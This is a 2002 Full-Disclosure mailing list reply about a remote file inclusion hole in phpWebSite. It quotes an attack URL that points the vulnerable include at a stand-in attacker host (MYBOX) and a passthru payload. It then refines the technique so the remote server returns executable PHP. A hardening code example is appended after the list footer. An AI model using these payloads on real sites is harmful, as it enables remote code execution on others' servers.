[Full-Disclosure] Re: PHP source injection in phpWebSite

From: avartat_private
Date: Mon Sep 23 2002 - 10:04:41 PDT

  • Next message: Tim Vandermeersch: "PHP source injection in phpWebSite"

    Hi Tim!
    
    > -------- modsecurity.php --------
    > <?php
    >  global $inc_prefix;
    >  if(!$inc_prefix) {
    >  ...
    >  }
    >  ...
    >  include_once($inc_prefix."htmlheader.php");
    > ?>
    > ----------------------------------
    >  
    > If someone requests a URL like 
    > http://SERVER/modsecurity.php?inc_prefix=http://MYBOX/, 
    > the htmlheader.php file from MYBOX would be included,
    > and the attacker would be able to include any code he 
    > wants.
    >  
    > Examples
    > ======== 
    > http://SERVER/catalog/inludes/include_once.php?inc_prefix=http://MYBOX/
    >  
    > --- htmlheader.php ---
    > <? passthru("/bin/ls") ?>
    > ----------------------
    > 
    > Output: dir listing of the current directory
    
    That's not completely right. You have to put an "echo" (with the right
    quoting around the evil code), because the evil webserver (MYBOX) usually executes
    files ending with .php (if MYBOX doesn't
    do it, the example is OK).
    So usually you want to put the following line in htmlheader.php on the evil
    server (MYBOX):
    <?php echo "<?php phpinfo();?>" ?> .
    Now, if you request MYBOX/htmlheader.php the following line would be
    included (and executed):
    <?php phpinfo();?>
    
    In the example of Tim, the /bin/ls output from the evil machine (MYBOX)
    would be included, because
    htmlheader (usually) gets executed, because of the .php suffix.
    It's important to point this out; I got a lot of mails from users that didn't
    get how to include $evil_code 
    when $evil_machine (aka MYBOX) interprets files with the .php suffix.
    
    Just my 0,2 EUR-Cents
    
    Regards,
    Avart
    
    -- 
    Become the "OnlineStar 2002" with us! Choose GMX now -
    and win great prizes! http://www.onlinestar.de
    
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
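The thread above shows why the include is exploitable regardless of how MYBOX serves .php files: whatever bytes come back are parsed by the victim's PHP. The following is an added example, not code from phpWebSite or from either poster, of how an include prefix can be validated on the application side so that stream wrappers and paths outside the installation are refused. It assumes modern PHP (7.1 or later), a Unix path layout, and a hypothetical PHPWS_BASE constant for the installation directory.

```php
<?php
// Added example (not part of the original post or of phpWebSite).
// The original code did include_once($inc_prefix."htmlheader.php") with
// $inc_prefix coming straight from the request (register_globals), so
// ?inc_prefix=http://MYBOX/ made PHP fetch and execute remote content.

// Hypothetical installation directory, assumed for this example.
define('PHPWS_BASE', __DIR__ . '/');

/**
 * Return a prefix that is safe to use in include_once(), or null.
 * Rejects anything with a scheme (http://, ftp://, php://, data: ...),
 * which PHP would treat as a stream wrapper, and any path that does
 * not resolve inside PHPWS_BASE (realpath() collapses "../").
 */
function safe_inc_prefix(?string $candidate): ?string
{
    // No value supplied: fall back to the installation's own directory.
    if ($candidate === null || $candidate === '') {
        return PHPWS_BASE;
    }
    // "scheme:" at the start means a wrapper, never a local directory.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $candidate)) {
        return null;
    }
    $real = realpath($candidate);
    if ($real === false || !is_dir($real)) {
        return null;
    }
    $real = rtrim($real, '/') . '/';
    // Must stay inside the application directory.
    if (strncmp($real, PHPWS_BASE, strlen(PHPWS_BASE)) !== 0) {
        return null;
    }
    return $real;
}

// Hardened version of the original include: refuse instead of trusting.
$inc_prefix = safe_inc_prefix($_GET['inc_prefix'] ?? null);
if ($inc_prefix === null) {
    header('HTTP/1.0 400 Bad Request');
    exit('invalid include prefix');
}
include_once($inc_prefix . 'htmlheader.php');
?>
```

The better fix is to not derive the prefix from the request at all; on PHP 5.2 and later, setting allow_url_include=Off in php.ini additionally blocks URL wrappers in include/require server-wide.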
    



    This archive was generated by hypermail 2b30 : Mon Sep 23 2002 - 10:32:22 PDT